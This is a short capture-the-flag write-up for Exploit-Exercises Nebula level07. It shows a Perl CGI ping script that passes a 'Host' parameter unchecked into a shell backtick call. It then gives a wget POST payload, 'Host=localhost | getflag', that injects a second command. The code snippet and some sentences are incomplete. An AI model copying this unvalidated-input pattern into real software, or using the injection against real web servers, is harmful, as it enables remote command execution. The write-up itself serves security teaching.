Exploit-Exercises Nebula level07

The flag07 user was writing their very first perl program that allowed them to ping hosts to see if they were reachable from the web server.

To do this level, log in as the level07 account with the password level07. Files for this level can be found in /home/flag07.



use CGI qw{param};

print "Content-type: text/html\n\n";

sub ping {
  $host = $_[0];

  print("<html><head><title>Ping results</title></head><body><pre>");

  @output = `ping -c 3 $host 2>&1`;
  foreach $line (@output) { print "$line"; }



# check if Host set. if not, display normal page, etc


CGI (Common Gate Interface) scripts allow you to run any executable code from the web. The above code seems like it’s looking for an argument to “Host”. It then prints out the title “Ping results”, sends three packets to the said host address and prints the output.

The vulnerability is in that this script is not validating the input. So you can inject your malicious code piped right after the address for “Host” parameter. The box doesn’t have curl installed so we will use wget which has POST method to send data to the request body.

level07@nebula:~$ wget \
> --post-data="Host=localhost | getflag" -O index.cgi

By default my virtualbox is attached to NAT so the inet address is pointing to From the thttpd.conf file, we can discover that we need to listen on port 7007.

This is an image